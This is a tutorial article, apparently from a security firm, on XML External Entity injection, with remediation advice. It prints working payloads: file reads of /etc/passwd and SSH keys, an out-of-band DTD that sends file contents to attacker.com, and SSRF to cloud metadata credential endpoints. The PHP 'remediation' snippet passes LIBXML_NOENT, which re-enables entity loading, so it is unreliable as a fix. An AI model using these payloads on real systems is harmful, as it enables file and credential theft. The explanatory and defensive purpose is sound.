XXE: XML External Entity Injection Explained
XML External Entity injection is a vulnerability class where the danger comes not from attacker-controlled code reaching a dangerous function, but from a feature working exactly as the specification intended. External entities are a legitimate part of the XML standard. The vulnerability is that applications allow untrusted input to control which external resources the parser retrieves.
Understanding XXE requires understanding what XML entities are and why external resolution exists in the first place.
How XML Entities Work
An XML entity is a named shorthand that expands to its declared value when referenced in the document. Internal entities are entirely self-contained:
<?xml version="1.0"?>
<!DOCTYPE config [
<!ENTITY appname "MyApplication">
]>
<config>
<title>&appname; Configuration</title>
</config>When parsed, &appname; expands to "MyApplication". This is a straightforward text substitution mechanism.
External entities extend this by pointing the entity declaration at a resource outside the document:
<?xml version="1.0"?>
<!DOCTYPE config [
<!ENTITY disclaimer SYSTEM "file:///legal/disclaimer.txt">
]>
<config>
<footer>&disclaimer;</footer>
</config>Here, the parser retrieves the contents of /legal/disclaimer.txt and substitutes them wherever &disclaimer; appears. The SYSTEM keyword indicates an external resource, and the URI scheme determines what kind of resource is fetched: file:// for local files, http:// for URLs, expect:// in PHP for command output.
When an application accepts XML from untrusted sources and processes it with a parser that resolves external entities, the attacker controls what the parser retrieves.
Classic XXE: Reading Local Files
The most direct form of XXE exploits the file:// URI scheme to read files from the server's filesystem.
A vulnerable application might accept XML for data import, configuration uploads, document processing, or SOAP API calls. The attacker submits:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>If the parser resolves external entities and the application returns any parsed value from the <data> element in its response, the contents of /etc/passwd appear in the HTTP response body.
This technique works against files the process has read access to. Common targets:
/etc/passwd— system user list, confirms the vulnerability and reveals usernames/etc/hosts— internal network hostnames and IP addresses~/.ssh/id_rsa— SSH private keys for the user running the application- Application configuration files at known paths — database credentials, API keys, connection strings
/proc/self/environ— environment variables including secrets passed at process start- Cloud instance metadata at
http://169.254.169.254/— identity credentials, IAM roles
The constraint is that file contents must be syntactically valid when substituted into the XML document. A file containing XML-special characters (<, >, &) will break the document structure and may cause a parse error before the contents can be read. This is addressed using CDATA sections or by reading the file indirectly through a crafted DTD.
Blind XXE: Out-of-Band Exfiltration
Many applications process XML without reflecting the parsed content in any response. They return a status code, a generic confirmation, or an entirely separate data structure. The parser resolves entities but the entity values never appear in the output the attacker can observe.
This is blind XXE. The application is vulnerable, but direct reading is not possible. Instead, the attacker redirects the retrieved content to an external destination they control.
Parameter Entities and Out-of-Band DTDs
Standard XML entities (general entities) cannot reference other entities within entity declarations. This limitation prevents constructing file-read payloads inline. Parameter entities — declared with % and usable only within DOCTYPE declarations — do not have this restriction.
An attacker hosts an external DTD file on their own server:
<!-- attacker.com/evil.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;
%send;The attack payload instructs the vulnerable parser to load this external DTD:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;
]>
<foo>trigger</foo>When the parser processes this document, it fetches the external DTD, which defines a chain of parameter entities. The chain reads the target file and constructs an HTTP request to the attacker's server with the file contents encoded in the URL. The attacker's server receives the DNS lookup and HTTP request, logging the exfiltrated data even though the vulnerable application's HTTP response reveals nothing.
DNS-Only Blind XXE
When outbound HTTP connections from the server are blocked but DNS is permitted, even a single DNS lookup confirms exploitability. Pointing an external entity at http://uniqueid.attacker.com/ causes the vulnerable parser to perform a DNS resolution for that subdomain. Observing the DNS lookup on the attacker's nameserver confirms that external entity resolution is occurring.
XXE for Server-Side Request Forgery
External entity URIs are not limited to file://. The http:// scheme causes the parser to make an HTTP request to the specified URL. When that URL points to internal network addresses rather than external domains, this becomes server-side request forgery originating from the server's internal network position.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ssrf SYSTEM "http://192.168.1.1/admin">
]>
<root>&ssrf;</root>The parser makes an HTTP request to 192.168.1.1/admin from the server's perspective. The response content may appear in the application's output or trigger different application behavior depending on the response received.
This provides access to:
- Internal administrative interfaces not exposed to the internet
- Cloud provider metadata services (
169.254.169.254) - Services bound to localhost that trust internal traffic
- Other microservices on the same network segment that do not authenticate requests from internal addresses
XXE-based SSRF is particularly effective in cloud environments where the instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns temporary IAM credentials that grant cloud API access.
Finding XXE Injection Points
Any endpoint that accepts XML is a potential XXE target. The attack surface is wider than most developers expect.
Obvious XML endpoints: SOAP web services, XML-RPC, document processors (DOCX, XLSX, SVG), RSS/Atom feed parsers, and configuration upload forms. These accept XML by design and are frequently tested.
Less obvious XML endpoints: Content-type header manipulation can reveal XML parsers behind JSON-looking interfaces. Changing Content-Type: application/json to Content-Type: application/xml and submitting an XML equivalent of the original request sometimes reveals XML parsers that process both formats.
File upload endpoints: DOCX, XLSX, PPTX, and SVG files are ZIP archives containing XML. An SVG file is XML. Uploading a crafted SVG or Office document with external entity declarations to endpoints that process these formats may trigger XXE in the document processing library. This is a common finding in applications that accept user-uploaded documents and render or summarize them server-side.
Indirect XML consumers: Libraries used for serialization, configuration loading, and template processing sometimes consume XML internally. A library deserializing an object from XML using an attacker-influenced input path can be vulnerable without the developer being aware that XML is processed.
When testing a suspected endpoint:
- Submit a basic XXE payload and observe whether the response changes in timing, content, or error messaging
- Point the external entity at a URL you control and watch for DNS or HTTP callbacks
- If callbacks arrive, proceed with file read or SSRF payloads
- If no callbacks arrive, the parser likely has external entity resolution disabled
The Impact of Poorly Configured Parsers
The severity of XXE depends on what the vulnerable application can access and what it returns.
A publicly-facing application running with limited filesystem permissions that reflects entity values in error messages can read application configuration files containing database credentials — a direct path from low-severity file disclosure to full database access.
An internal tool running with elevated permissions on a network with access to cloud metadata services turns an XXE vulnerability into AWS, GCP, or Azure credential theft, granting cloud API access that may far exceed what the application itself was intended to provide.
The vulnerability is the external entity resolution. The impact is a function of the environment.
Remediation
Disable External Entity Processing
The correct fix is to configure the XML parser to refuse to process external entities and external DTDs before any input reaches it. This is a parser configuration change, not an input validation rule.
Java (DocumentBuilderFactory):
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);Java (XMLInputFactory for StAX parsers):
XMLInputFactory factory = XMLInputFactory.newInstance();
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);Python:
Use the defusedxml library instead of the standard xml.etree.ElementTree or lxml. It disables all dangerous XML features by default:
import defusedxml.ElementTree as ET
tree = ET.parse(xml_file) # Safe — external entities and DTDs disabledPHP:
libxml_disable_entity_loader(true); // PHP < 8.0
// PHP 8.0+ disables external entity loading by default
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);In PHP 8.0 and later, external entity loading is disabled by default, but explicitly passing LIBXML_NOENT to loadXML() re-enables it — a common accidental reintroduction.
Use Safer Data Formats
If the endpoint does not specifically require XML, replace it with JSON. JSON parsers do not have a concept of external references. There are no entity declarations, no DTDs, no external resource resolution. The entire vulnerability class is eliminated.
For internal services where format choice is flexible, this is the preferred approach.
Validate XML Schema Without Entity Resolution
If XML is required, validate documents against a strict schema after disabling external entity processing. Schema validation cannot substitute for disabling external entities — validation occurs after parsing, and parsing with external entities enabled is when the damage occurs. The order matters: disable external entity resolution first, then validate structure.
Why Filtering Does Not Work
A common remediation attempt is to filter the input for DOCTYPE declarations or the SYSTEM keyword. This is insufficient. DOCTYPE can be encoded using alternative character representations. SYSTEM can appear in unusual contexts. Character encoding variations in the XML declaration can cause character-by-character filtering to miss the pattern.
The vulnerability is not in the document's content reaching application code. It is in the parser executing the XML specification's external entity feature. Only disabling that feature in the parser prevents the vulnerability. Filtering what reaches the parser is an arms race that defenders reliably lose against a sufficiently motivated attacker.
Need your application's XML attack surface assessed? Get in touch.